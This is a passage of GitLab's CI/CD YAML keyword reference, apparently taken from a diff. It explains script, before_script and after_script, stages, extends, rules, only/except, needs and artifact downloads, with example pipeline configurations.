`services`](../services/index.md#available-settings-for-services). + +##### `services:entrypoint` + +An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). + +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). + +##### `services:command` + +An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). + +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). + +### `script` + +Use `script` to specify a shell script for the runner to execute. + +All jobs except [trigger jobs](#trigger) require a `script` keyword. + +For example: + +```yaml +job: + script: "bundle exec rspec" +``` + +You can use [YAML anchors with `script`](#yaml-anchors-for-scripts). + +The `script` keyword can also contain several commands in an array: + +```yaml +job: + script: + - uname -a + - bundle exec rspec +``` + +Sometimes, `script` commands must be wrapped in single or double quotes. +For example, commands that contain a colon (`:`) must be wrapped in single quotes (`'`). +The YAML parser needs to interpret the text as a string rather than +a "key: value" pair. + +For example, this script uses a colon: + +```yaml +job: + script: + - curl --request POST --header 'Content-Type: application/json' "https://gitlab/api/v4/projects" +``` + +To be considered valid YAML, you must wrap the entire command in single quotes. If +the command already uses single quotes, you should change them to double quotes (`"`) +if possible: + +```yaml +job: + script: + - 'curl --request POST --header "Content-Type: application/json" "https://gitlab/api/v4/projects"' +``` + +You can verify the syntax is valid with the [CI Lint](../lint.md) tool. + +Be careful when using these characters as well: + +- `{`, `}`, `[`, `]`, `,`, `&`, `*`, `#`, `?`, `|`, `-`, `<`, `>`, `=`, `!`, `%`, `@`, `` ` ``. + +If any of the script commands return an exit code other than zero, the job +fails and further commands are not executed. Store the exit code in a variable to +avoid this behavior: + +```yaml +job: + script: + - false || exit_code=$? + - if [ $exit_code -ne 0 ]; then echo "Previous command failed"; fi; +``` + +#### `before_script` + +Use `before_script` to define an array of commands that should run before each job, +but after [artifacts](#artifacts) are restored. + +Scripts you specify in `before_script` are concatenated with any scripts you specify +in the main [`script`](#script). The combine scripts execute together in a single shell. + +You can overwrite a globally-defined `before_script` if you define it in a job: + +```yaml +default: + before_script: + - echo "Execute this script in all jobs that don't already have a before_script section." + +job1: + script: + - echo "This script executes after the global before_script." + +job: + before_script: + - echo "Execute this script instead of the global before_script." + script: + - echo "This script executes after the job's `before_script`" +``` + +You can use [YAML anchors with `before_script`](#yaml-anchors-for-scripts). + +#### `after_script` + +Use `after_script` to define an array of commands that run after each job, +including failed jobs. + +If a job times out or is cancelled, the `after_script` commands do not execute. +An [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/15603) exists to support +executing `after_script` commands for timed-out or cancelled jobs. + +Scripts you specify in `after_script` execute in a new shell, separate from any +`before_script` or `script` scripts. As a result, they: + +- Have a current working directory set back to the default. +- Have no access to changes done by scripts defined in `before_script` or `script`, including: + - Command aliases and variables exported in `script` scripts. + - Changes outside of the working tree (depending on the runner executor), like + software installed by a `before_script` or `script` script. +- Have a separate timeout, which is hard coded to 5 minutes. See the + [related issue](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2716) for details. +- Don't affect the job's exit code. If the `script` section succeeds and the + `after_script` times out or fails, the job exits with code `0` (`Job Succeeded`). + +```yaml +default: + after_script: + - echo "Execute this script in all jobs that don't already have an after_script section." + +job1: + script: + - echo "This script executes first. When it completes, the global after_script executes." + +job: + script: + - echo "This script executes first. When it completes, the job's `after_script` executes." + after_script: + - echo "Execute this script instead of the global after_script." +``` + +You can use [YAML anchors with `after_script`](#yaml-anchors-for-scripts). + +#### Script syntax + +You can use syntax in [`script`](#script) sections to: + +- [Split long commands](script.md#split-long-commands) into multiline commands. +- [Use color codes](script.md#add-color-codes-to-script-output) to make job logs easier to review. +- [Create custom collapsible sections](../jobs/index.md#custom-collapsible-sections) + to simplify job log output. + +### `stage` + +Use `stage` to define which stage a job runs in. Jobs in the same +`stage` can execute in parallel (subject to [certain conditions](#use-your-own-runners)). + +Jobs without a `stage` entry use the `test` stage by default. If you do not define +[`stages`](#stages) in the pipeline, you can use the 5 default stages, which execute in +this order: + +- [`.pre`](#pre-and-post) +- `build` +- `test` +- `deploy` +- [`.post`](#pre-and-post) +For example: + +```yaml +stages: + - build + - test + - deploy + +job 0: + stage: .pre + script: make something useful before build stage + +job 1: + stage: build + script: make build dependencies + +job 2: + stage: build + script: make build artifacts + +job 3: + stage: test + script: make test + +job 4: + stage: deploy + script: make deploy + +job 5: + stage: .post + script: make something useful at the end of pipeline +``` + +#### Use your own runners + +When you use your own runners, each runner runs only one job at a time by default. +Jobs can run in parallel if they run on different runners. + +If you have only one runner, jobs can run in parallel if the runner's +[`concurrent` setting](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-global-section) +is greater than `1`. + +#### `.pre` and `.post` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31441) in GitLab 12.4. + +Use `pre` and `post` for jobs that need to run first or last in a pipeline. + +- `.pre` is guaranteed to always be the first stage in a pipeline. +- `.post` is guaranteed to always be the last stage in a pipeline. + +User-defined stages are executed after `.pre` and before `.post`. + +You must have a job in at least one stage other than `.pre` or `.post`. + +You can't change the order of `.pre` and `.post`, even if you define them out of order in the `.gitlab-ci.yml` file. +For example, the following configurations are equivalent: + +```yaml +stages: + - .pre + - a + - b + - .post +``` + +```yaml +stages: + - a + - .pre + - b + - .post +``` + +```yaml +stages: + - a + - b +``` + +### `extends` + +> Introduced in GitLab 11.3. + +Use `extends` to reuse configuration sections. It's an alternative to [YAML anchors](#anchors) +and is a little more flexible and readable. You can use `extends` to reuse configuration +from [included configuration files](#use-extends-and-include-together). + +In the following example, the `rspec` job uses the configuration from the `.tests` template job. +GitLab: + +- Performs a reverse deep merge based on the keys. +- Merges the `.tests` content with the `rspec` job. +- Doesn't merge the values of the keys. + +```yaml +.tests: + script: rake test + stage: test + only: + refs: + - branches + +rspec: + extends: .tests + script: rake rspec + only: + variables: + - $RSPEC +``` + +The result is this `rspec` job: + +```yaml +rspec: + script: rake rspec + stage: test + only: + refs: + - branches + variables: + - $RSPEC +``` + +`.tests` in this example is a [hidden job](#hide-jobs), but it's +possible to extend configuration from regular jobs as well. + +`extends` supports multi-level inheritance. You should avoid using more than three levels, +but you can use as many as eleven. The following example has two levels of inheritance: + +```yaml +.tests: + rules: + - if: $CI_PIPELINE_SOURCE == "push" + +.rspec: + extends: .tests + script: rake rspec + +rspec 1: + variables: + RSPEC_SUITE: '1' + extends: .rspec + +rspec 2: + variables: + RSPEC_SUITE: '2' + extends: .rspec + +spinach: + extends: .tests + script: rake spinach +``` + +In GitLab 12.0 and later, it's also possible to use multiple parents for +`extends`. + +#### Merge details + +You can use `extends` to merge hashes but not arrays. +The algorithm used for merge is "closest scope wins," so +keys from the last member always override anything defined on other +levels. For example: + +```yaml +.only-important: + variables: + URL: "http://my-url.internal" + IMPORTANT_VAR: "the details" + rules: + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH + - if: $CI_COMMIT_BRANCH == "stable" + tags: + - production + script: + - echo "Hello world!" + +.in-docker: + variables: + URL: "http://docker-url.internal" + tags: + - docker + image: alpine + +rspec: + variables: + GITLAB: "is-awesome" + extends: + - .only-important + - .in-docker + script: + - rake rspec +``` + +The result is this `rspec` job: + +```yaml +rspec: + variables: + URL: "http://docker-url.internal" + IMPORTANT_VAR: "the details" + GITLAB: "is-awesome" + rules: + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH + - if: $CI_COMMIT_BRANCH == "stable" + tags: + - docker + image: alpine + script: + - rake rspec +``` + +In this example: + +- The `variables` sections merge, but `URL: "http://docker-url.internal"` overwrites `URL: "http://my-url.internal"`. +- `tags: ['docker']` overwrites `tags: ['production']`. +- `script` does not merge, but `script: ['rake rspec']` overwrites + `script: ['echo "Hello world!"']`. You can use [YAML anchors](#anchors) to merge arrays. + +#### Use `extends` and `include` together + +To reuse configuration from different configuration files, +combine `extends` and [`include`](#include). + +In the following example, a `script` is defined in the `included.yml` file. +Then, in the `.gitlab-ci.yml` file, `extends` refers +to the contents of the `script`: + +- `included.yml`: + + ```yaml + .template: + script: + - echo Hello! + ``` + +- `.gitlab-ci.yml`: + + ```yaml + include: included.yml + + useTemplate: + image: alpine + extends: .template + ``` + +### `rules` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27863) in GitLab 12.3. + +Use `rules` to include or exclude jobs in pipelines. + +Rules are evaluated *in order* until the first match. When a match is found, the job +is either included or excluded from the pipeline, depending on the configuration. + +`rules` replaces [`only/except`](#only--except) and they can't be used together +in the same job. If you configure one job to use both keywords, the GitLab returns +a `key may not be used with rules` error. + +`rules` accepts an array of rules defined with: + +- `if` +- `changes` +- `exists` +- `allow_failure` +- `variables` +- `when` + +You can combine multiple keywords together for [complex rules](../jobs/job_control.md#complex-rules). + +The job is added to the pipeline: + +- If an `if`, `changes`, or `exists` rule matches and also has `when: on_success` (default), + `when: delayed`, or `when: always`. +- If a rule is reached that is only `when: on_success`, `when: delayed`, or `when: always`. + +The job is not added to the pipeline: + +- If no rules match. +- If a rule matches and has `when: never`. + +#### `rules:if` + +Use `rules:if` clauses to specify when to add a job to a pipeline: + +- If an `if` statement is true, add the job to the pipeline. +- If an `if` statement is true, but it's combined with `when: never`, do not add the job to the pipeline. +- If no `if` statements are true, do not add the job to the pipeline. + +`if:` clauses are evaluated based on the values of [predefined CI/CD variables](../variables/predefined_variables.md) +or [custom CI/CD variables](../variables/index.md#custom-cicd-variables). + +**Keyword type**: Job-specific and pipeline-specific. You can use it as part of a job +to configure the job behavior, or with [`workflow`](#workflow) to configure the pipeline behavior. + +**Possible inputs**: A [CI/CD variable expression](../jobs/job_control.md#cicd-variable-expressions). + +**Example of `rules:if`**: + +```yaml +job: + script: echo "Hello, Rules!" + rules: + - if: '$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME =~ /^feature/ && $CI_MERGE_REQUEST_TARGET_BRANCH_NAME != $CI_DEFAULT_BRANCH' + when: never + - if: '$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME =~ /^feature/' + when: manual + allow_failure: true + - if: '$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME' +``` + +**Additional details**: + +- If a rule matches and has no `when` defined, the rule uses the `when` + defined for the job, which defaults to `on_success` if not defined. +- You can define `when` once per rule, or once at the job-level, which applies to + all rules. You can't mix `when` at the job-level with `when` in rules. +- Unlike variables in [`script`](../variables/index.md#use-cicd-variables-in-job-scripts) + sections, variables in rules expressions are always formatted as `$VARIABLE`. + +**Related topics**: + +- [Common `if` expressions for `rules`](../jobs/job_control.md#common-if-clauses-for-rules). +- [Avoid duplicate pipelines](../jobs/job_control.md#avoid-duplicate-pipelines). + +#### `rules:changes` + +Use `rules:changes` to specify when to add a job to a pipeline by checking for changes +to specific files. + +WARNING: +You should use `rules: changes` only with **branch pipelines** or **merge request pipelines**. +You can use `rules: changes` with other pipeline types, but `rules: changes` always +evaluates to true when there is no Git `push` event. Tag pipelines, scheduled pipelines, +and so on do **not** have a Git `push` event associated with them. A `rules: changes` job +is **always** added to those pipelines if there is no `if:` that limits the job to +branch or merge request pipelines. + +**Keyword type**: Job keyword. You can use it only as part of a job. + +**Possible inputs**: An array of file paths. In GitLab 13.6 and later, +[file paths can include variables](../jobs/job_control.md#variables-in-ruleschanges). + +**Example of `rules:changes`**: + +```yaml +docker build: + script: docker build -t my-image:$CI_COMMIT_REF_SLUG . + rules: + - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' + changes: + - Dockerfile + when: manual + allow_failure: true +``` + +- If the pipeline is a merge request pipeline, check `Dockerfile` for changes. +- If `Dockerfile` has changed, add the job to the pipeline as a manual job, and the pipeline + continues running even if the job is not triggered (`allow_failure: true`). +- If `Dockerfile` has not changed, do not add job to any pipeline (same as `when: never`). + +**Additional details**: + +- `rules: changes` works the same way as [`only: changes` and `except: changes`](#onlychanges--exceptchanges). +- You can use `when: never` to implement a rule similar to [`except:changes`](#onlychanges--exceptchanges). + +#### `rules:exists` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/24021) in GitLab 12.4. + +Use `exists` to run a job when certain files exist in the repository. + +**Keyword type**: Job keyword. You can use it only as part of a job. + +**Possible inputs**: An array of file paths. Paths are relative to the project directory (`$CI_PROJECT_DIR`) +and can't directly link outside it. File paths can use glob patterns. + +**Example of `rules:exists`**: + +```yaml +job: + script: docker build -t my-image:$CI_COMMIT_REF_SLUG . + rules: + - exists: + - Dockerfile +``` + +`job` runs if a `Dockerfile` exists anywhere in the repository. + +**Additional details**: + +- Glob patterns are interpreted with Ruby [`File.fnmatch`](https://docs.ruby-lang.org/en/2.7.0/File.html#method-c-fnmatch) + with the flags `File::FNM_PATHNAME | File::FNM_DOTMATCH | File::FNM_EXTGLOB`. +- For performance reasons, GitLab matches a maximum of 10,000 `exists` patterns or + file paths. After the 10,000th check, rules with patterned globs always match. + In other words, the `exists` rule always assumes a match in projects with more + than 10,000 files. + +#### `rules:allow_failure` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30235) in GitLab 12.8. + +Use [`allow_failure: true`](#allow_failure) in `rules:` to allow a job to fail +without stopping the pipeline. + +You can also use `allow_failure: true` with a manual job. The pipeline continues +running without waiting for the result of the manual job. `allow_failure: false` +combined with `when: manual` in rules causes the pipeline to wait for the manual +job to run before continuing. + +**Keyword type**: Job keyword. You can use it only as part of a job. + +**Possible inputs**: `true` or `false`. Defaults to `false` if not defined. + +**Example of `rules:allow_failure`**: + +```yaml +job: + script: echo "Hello, Rules!" + rules: + - if: '$CI_MERGE_REQUEST_TARGET_BRANCH_NAME == $CI_DEFAULT_BRANCH' + when: manual + allow_failure: true +``` + +If the rule matches, then the job is a manual job with `allow_failure: true`. + +**Additional details**: + +- The rule-level `rules:allow_failure` overrides the job-level [`allow_failure`](#allow_failure), + and only applies when the specific rule triggers the job. + +#### `rules:variables` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/209864) in GitLab 13.7. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/289803) in GitLab 13.10. + +Use [`variables`](#variables) in `rules:` to define variables for specific conditions. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: A hash of variables in the format `VARIABLE-NAME: value`. + +**Example of `rules:variables`**: + +```yaml +job: + variables: + DEPLOY_VARIABLE: "default-deploy" + rules: + - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH + variables: # Override DEPLOY_VARIABLE defined + DEPLOY_VARIABLE: "deploy-production" # at the job level. + - if: $CI_COMMIT_REF_NAME =~ /feature/ + variables: + IS_A_FEATURE: "true" # Define a new variable. + script: + - echo "Run script with $DEPLOY_VARIABLE as an argument" + - echo "Run another script if $IS_A_FEATURE exists" +``` + +### `only` / `except` + +NOTE: +`only` and `except` are not being actively developed. [`rules`](#rules) is the preferred +keyword to control when to add jobs to pipelines. + +You can use `only` and `except` to control when to add jobs to pipelines. + +- Use `only` to define when a job runs. +- Use `except` to define when a job **does not** run. + +Four keywords can be used with `only` and `except`: + +- [`refs`](#onlyrefs--exceptrefs) +- [`variables`](#onlyvariables--exceptvariables) +- [`changes`](#onlychanges--exceptchanges) +- [`kubernetes`](#onlykubernetes--exceptkubernetes) + +See [specify when jobs run with `only` and `except`](../jobs/job_control.md#specify-when-jobs-run-with-only-and-except) +for more details and examples. + +#### `only:refs` / `except:refs` + +Use the `only:refs` and `except:refs` keywords to control when to add jobs to a +pipeline based on branch names or pipeline types. + +**Keyword type**: Job keyword. You can use it only as part of a job. + +**Possible inputs**: An array including any number of: + +- Branch names, for example `main` or `my-feature-branch`. +- [Regular expressions](../jobs/job_control.md#only--except-regex-syntax) + that match against branch names, for example `/^feature-.*/`. +- The following keywords: + + | **Value** | **Description** | + | -------------------------|-----------------| + | `api` | For pipelines triggered by the [pipelines API](../../api/pipelines.md#create-a-new-pipeline). | + | `branches` | When the Git reference for a pipeline is a branch. | + | `chat` | For pipelines created by using a [GitLab ChatOps](../chatops/index.md) command. | + | `external` | When you use CI services other than GitLab. | + | `external_pull_requests` | When an external pull request on GitHub is created or updated (See [Pipelines for external pull requests](../ci_cd_for_external_repos/index.md#pipelines-for-external-pull-requests)). | + | `merge_requests` | For pipelines created when a merge request is created or updated. Enables [merge request pipelines](../pipelines/merge_request_pipelines.md), [merged results pipelines](../pipelines/pipelines_for_merged_results.md), and [merge trains](../pipelines/merge_trains.md). | + | `pipelines` | For [multi-project pipelines](../pipelines/multi_project_pipelines.md) created by [using the API with `CI_JOB_TOKEN`](../pipelines/multi_project_pipelines.md#create-multi-project-pipelines-by-using-the-api), or the [`trigger`](#trigger) keyword. | + | `pushes` | For pipelines triggered by a `git push` event, including for branches and tags. | + | `schedules` | For [scheduled pipelines](../pipelines/schedules.md). | + | `tags` | When the Git reference for a pipeline is a tag. | + | `triggers` | For pipelines created by using a [trigger token](../triggers/index.md#trigger-token). | + | `web` | For pipelines created by using **Run pipeline** button in the GitLab UI, from the project's **CI/CD > Pipelines** section. | + +**Example of `only:refs` and `except:refs`**: + +```yaml +job1: + script: echo + only: + - main + - /^issue-.*$/ + - merge_requests + +job2: + script: echo + except: + - main + - /^stable-branch.*$/ + - schedules +``` + +**Additional details:** + +- Scheduled pipelines run on specific branches, so jobs configured with `only: branches` + run on scheduled pipelines too. Add `except: schedules` to prevent jobs with `only: branches` + from running on scheduled pipelines. +- `only` or `except` used without any other keywords are equivalent to `only: refs` + or `except: refs`. For example, the following two jobs configurations have the same + behavior: + + ```yaml + job1: + script: echo + only: + - branches + + job2: + script: echo + only: + refs: + - branches + ``` + +- If a job does not use `only`, `except`, or [`rules`](#rules), then `only` is set to `branches` + and `tags` by default. + + For example, `job1` and `job2` are equivalent: + + ```yaml + job1: + script: echo 'test' + + job2: + script: echo 'test' + only: + - branches + - tags + ``` + +#### `only:variables` / `except:variables` + +Use the `only:variables` or `except:variables` keywords to control when to add jobs +to a pipeline, based on the status of [CI/CD variables](../variables/index.md). + +**Keyword type**: Job keyword. You can use it only as part of a job. + +**Possible inputs**: An array of [CI/CD variable expressions](../jobs/job_control.md#cicd-variable-expressions). + +**Example of `only:variables`**: + +```yaml +deploy: + script: cap staging deploy + only: + variables: + - $RELEASE == "staging" + - $STAGING +``` + +**Related topics**: + +- [`only:variables` and `except:variables` examples](../jobs/job_control.md#only-variables--except-variables-examples). + +#### `only:changes` / `except:changes` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/19232) in GitLab 11.4. + +Use the `changes` keyword with `only` to run a job, or with `except` to skip a job, +when a Git push event modifies a file. + +Use `changes` in pipelines with the following refs: + +- `branches` +- `external_pull_requests` +- `merge_requests` (see additional details about [using `only:changes` with pipelines for merge requests](../jobs/job_control.md#use-onlychanges-with-pipelines-for-merge-requests)) + +**Keyword type**: Job keyword. You can use it only as part of a job. + +**Possible inputs**: An array including any number of: + +- Paths to files. +- Wildcard paths for single directories, for example `path/to/directory/*`, or a directory + and all its subdirectories, for example `path/to/directory/**/*`. +- Wildcard ([glob](https://en.wikipedia.org/wiki/Glob_(programming))) paths for all + files with the same extension or multiple extensions, for example `*.md` or `path/to/directory/*.{rb,py,sh}`. +- Wildcard paths to files in the root directory, or all directories, wrapped in double quotes. + For example `"*.json"` or `"**/*.json"`. + +**Example of `only:changes`**: + +```yaml +docker build: + script: docker build -t my-image:$CI_COMMIT_REF_SLUG . + only: + refs: + - branches + changes: + - Dockerfile + - docker/scripts/* + - dockerfiles/**/* + - more_scripts/*.{rb,py,sh} +``` + +**Additional details**: + +- If you use refs other than `branches`, `external_pull_requests`, or `merge_requests`, + `changes` can't determine if a given file is new or old and always returns `true`. +- If you use `only: changes` with other refs, jobs ignore the changes and always run. +- If you use `except: changes` with other refs, jobs ignore the changes and never run. + +**Related topics**: + +- [`only: changes` and `except: changes` examples](../jobs/job_control.md#onlychanges--exceptchanges-examples). +- If you use `changes` with [only allow merge requests to be merged if the pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md#only-allow-merge-requests-to-be-merged-if-the-pipeline-succeeds), + you should [also use `only:merge_requests`](../jobs/job_control.md#use-onlychanges-with-pipelines-for-merge-requests). +- Use `changes` with [new branches or tags *without* pipelines for merge requests](../jobs/job_control.md#use-onlychanges-without-pipelines-for-merge-requests). +- Use `changes` with [scheduled pipelines](../jobs/job_control.md#use-onlychanges-with-scheduled-pipelines). + +#### `only:kubernetes` / `except:kubernetes` + +Use `only:kubernetes` or `except:kubernetes` to control if jobs are added to the pipeline +when the Kubernetes service is active in the project. + +**Keyword type**: Job-specific. You can use it only as part of a job. + +**Possible inputs**: The `kubernetes` strategy accepts only the `active` keyword. + +**Example of `only:kubernetes`**: + +```yaml +deploy: + only: + kubernetes: active +``` + +In this example, the `deploy` job runs only when the Kubernetes service is active +in the project. + +### `needs` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/47063) in GitLab 12.2. +> - In GitLab 12.3, maximum number of jobs in `needs` array raised from five to 50. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30631) in GitLab 12.8, `needs: []` lets jobs start immediately. + +Use `needs:` to execute jobs out-of-order. Relationships between jobs +that use `needs` can be visualized as a [directed acyclic graph](../directed_acyclic_graph/index.md). + +You can ignore stage ordering and run some jobs without waiting for others to complete. +Jobs in multiple stages can run concurrently. + +The following example creates four paths of execution: + +- Linter: the `lint` job runs immediately without waiting for the `build` stage + to complete because it has no needs (`needs: []`). +- Linux path: the `linux:rspec` and `linux:rubocop` jobs runs as soon as the `linux:build` + job finishes without waiting for `mac:build` to finish. +- macOS path: the `mac:rspec` and `mac:rubocop` jobs runs as soon as the `mac:build` + job finishes, without waiting for `linux:build` to finish. +- The `production` job runs as soon as all previous jobs finish; in this case: + `linux:build`, `linux:rspec`, `linux:rubocop`, `mac:build`, `mac:rspec`, `mac:rubocop`. + +```yaml +linux:build: + stage: build + script: echo "Building linux..." + +mac:build: + stage: build + script: echo "Building mac..." + +lint: + stage: test + needs: [] + script: echo "Linting..." + +linux:rspec: + stage: test + needs: ["linux:build"] + script: echo "Running rspec on linux..." + +linux:rubocop: + stage: test + needs: ["linux:build"] + script: echo "Running rubocop on linux..." + +mac:rspec: + stage: test + needs: ["mac:build"] + script: echo "Running rspec on mac..." + +mac:rubocop: + stage: test + needs: ["mac:build"] + script: echo "Running rubocop on mac..." + +production: + stage: deploy + script: echo "Running production..." +``` + +#### Requirements and limitations + +- In [GitLab 14.1 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/30632) + you can refer to jobs in the same stage as the job you are configuring. This feature + is [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +- Disabled on GitLab.com. +- Not recommended for production use. +- For GitLab self-managed instances, GitLab adminsitrators + can choose to [disable it](#enable-or-disable-needs-for-jobs-in-the-same-stage) +- In GitLab 14.0 and older, you can only refer to jobs in earlier stages. +- In GitLab 13.9 and older, if `needs:` refers to a job that might not be added to + a pipeline because of `only`, `except`, or `rules`, the pipeline might fail to create. +- The maximum number of jobs that a single job can need in the `needs:` array is limited: + - For GitLab.com, the limit is 50. For more information, see our + [infrastructure issue](https://gitlab.com/gitlab-com/gl-infra/infrastructure/-/issues/7541). + - For self-managed instances, the limit is: 50. This limit [can be changed](#changing-the-needs-job-limit). +- If `needs:` refers to a job that uses the [`parallel`](#parallel) keyword, + it depends on all jobs created in parallel, not just one job. It also downloads + artifacts from all the parallel jobs by default. If the artifacts have the same + name, they overwrite each other and only the last one downloaded is saved. +- `needs:` is similar to `dependencies:` in that it must use jobs from prior stages, + meaning it's impossible to create circular dependencies. Depending on jobs in the + current stage is not possible either, but support [is planned](https://gitlab.com/gitlab-org/gitlab/-/issues/30632). +- Stages must be explicitly defined for all jobs + that have the keyword `needs:` or are referred to by one. + +##### Enable or disable `needs` for jobs in the same stage **(FREE SELF)** + +`needs` for jobs in the same stage is under development but ready for production use. +It is deployed behind a feature flag that is **enabled by default**. +[GitLab administrators with access to the GitLab Rails +console](../../administration/feature_flags.md) +can opt to disable it. + +To enable it: + +`Feature.enable(:ci_same_stage_job_needs)` + +To disable it: + +`Feature.disable(:ci_same_stage_job_needs)` + +##### Changing the `needs:` job limit **(FREE SELF)** + +The maximum number of jobs that can be defined in `needs:` defaults to 50. + +A GitLab administrator with [access to the GitLab Rails console](../../administration/feature_flags.md) +can choose a custom limit. For example, to set the limit to 100: + +```ruby +Plan.default.actual_limits.update!(ci_needs_size_limit: 100) +``` + +To disable directed acyclic graphs (DAG), set the limit to `0`. + +#### Artifact downloads with `needs` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14311) in GitLab v12.6. + +When a job uses `needs`, it no longer downloads all artifacts from previous stages +by default, because jobs with `needs` can start before earlier stages complete. With +`needs` you can only download artifacts from the jobs listed in the `needs:` configuration. + +Use `artifacts: true` (default) or `artifacts: false` to control when artifacts are +downloaded in jobs that use `needs`. + +In the following example, the `rspec` job downloads the `build_job` artifacts, but the +`rubocop` job does not: + +```yaml +build_job: + stage: build + artifacts: + paths: + - binaries/ + +rspec: + stage: test + needs: + - job: build_job + artifacts: true + +rubocop: + stage: test + needs: + - job: build_job + artifacts: false +``` + +In the following example, the `rspec` job downloads the artifacts from all three `build_jobs`. +`artifacts` is: + +- Set to true for `build_job_1`. +- Defaults to true for both `build_job_2` and `build_job_3`. + +```yaml +rspec: + needs: + - job: build_job_1 + artifacts: true + - job: build_job_2 + - build_job_3 +``` + +In GitLab 12.6 and later, you can't combine the [`dependencies`](#dependencies) keyword +with `needs`. + +#### Cross project artifact downloads with `needs` **(PREMIUM)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14311) in GitLab v12.7. + +Use `needs` to download artifacts from up to five jobs in pipelines: + +- [On other refs in the same project](#artifact-downloads-between-pipelines-in-the-same-project). +- In different projects, groups and namespaces. + +```yaml +build_job: + stage: build + script: + - ls -lhR + needs: + - project: namespace/group/project-name + job: build-1 + ref: main + artifacts: true +``` + +`build_job` downloads the artifacts from the latest successful `build-1` job +on the `main` branch in the `group/project-name` project. If the project is in the +same group or namespace, you can omit them from the `project:` keyword. For example, +`project: group/project-name` or `project: project-name`. + +The user running the pipeline must have at least `reporter` access to the group or project, or the group/project must have public visibility. + +##### Artifact downloads between pipelines in the same project + +Use `needs` to download artifacts from different pipelines in the current project. +Set the `project` keyword as the current project's name, and specify a ref. + +In the following example, `build_job` downloads the artifacts for the latest successful +`build-1` job with the `other-ref` ref: + +```yaml +build_job: + stage: build + script: + - ls -lhR + needs: + - project: group/same-project-name + job: build-1 + ref: other-ref + artifacts: true +``` + +CI/CD variable support for `project:`, `job:`, and `ref` was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/202093) +in GitLab 13.3. [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/235761) in GitLab 13.4. + +For example: + +```yaml +build_job: + stage: build + script: + - ls -lhR + needs: + - project: $CI_PROJECT_PATH + job: $DEPENDENCY_JOB_NAME + ref: $ARTIFACTS_DOWNLOAD_REF + artifacts: true +``` + +You can't download artifacts from jobs that run in [`parallel:`](#parallel). + +To download artifacts between [parent-child pipelines](../pipelines/parent_child_pipelines.md), +use [`needs:pipeline`](#artifact-downloads-to-child-pipelines). + +You should not download artifacts from the same ref as a running pipeline. Concurrent +pipelines running on the same ref could override the artifacts. + +#### Artifact downloads to child pipelines + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/255983) in GitLab v13.7. + +A [child pipeline](../pipelines/parent_child_pipelines.md) can download artifacts from a job in +its parent pipeline or another child pipeline in the same parent-child pipeline hierarchy. + +For example, with the following parent pipeline that has a job that creates some artifacts: + +```yaml +create-artifact: + stage: build + script: echo 'sample artifact' > artifact.txt + artifacts: + paths: [artifact.txt] + +child-pipeline: + stage: test + trigger: + include: child.yml + strategy: depend + variables: + PARENT_PIPELINE_ID: $CI_PIPELINE_ID +``` + +A job in the child pipeline can download artifacts from the `create-artifact` job in +the parent pipeline: + +```yaml +use-artifact: + script: cat artifact.txt + needs: + - pipeline: $PARENT_PIPELINE_ID + job: create-artifact +``` + +The `pipeline` attribute accepts a pipeline ID and it must be a pipeline present +in the same parent-child pipeline hierarchy of the given pipeline. + +The `pipeline` attribute does not accept the current pipeline ID (`$CI_PIPELINE_ID`). +To download artifacts from a job in the current pipeline, use the basic form of [`needs`](#artifact-downloads-with-needs). + +#### Optional `needs` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30680) in GitLab 13.10. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/323891) in GitLab 14.0. + +To need a job that sometimes does not exist in the pipeline, add `optional: true` +to the `needs` configuration. If not defined, `optional: false` is the default. + +Jobs that use [`rules`](#rules), [`only`, or `except`](#only--except), might +not always exist in a pipeline. When the pipeline starts, it checks the `needs` +relationships before running. Without `optional: true`, needs relationships that +point to a job that does not exist stops the pipeline from starting and causes a pipeline +error similar to: + +- `'job1' job needs 'job2' job, but it was not added to the pipeline` + +In this example: + +- When the branch is the default branch, the `build` job exists in the pipeline, and the `rspec` + job waits for it to complete before starting. +- When the branch is not the default branch, the `build` job does not exist in the pipeline. + The `rspec` job runs immediately (similar to `needs: []`) because its `needs` + relationship to the `build` job is optional. + +```yaml +build: + stage: build + rules: + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH + +rspec: + stage: test + needs: + - job: build + optional: true +``` + +### `tags` + +Use `tags` to select a specific runner from the list of all runners that are +available for the project. + +When you register a runner, you can specify the runner's tags, for +example `ruby`, `postgres`, `development`. + +In the following example, the job is run by a runner that +has both `ruby` and `postgres` tags defined. + +```yaml +job: + tags: + - ruby + - postgres +``` + +You can use tags to run different jobs on different platforms. For +example, if you have an OS X runner with tag `osx` and a Windows runner with tag 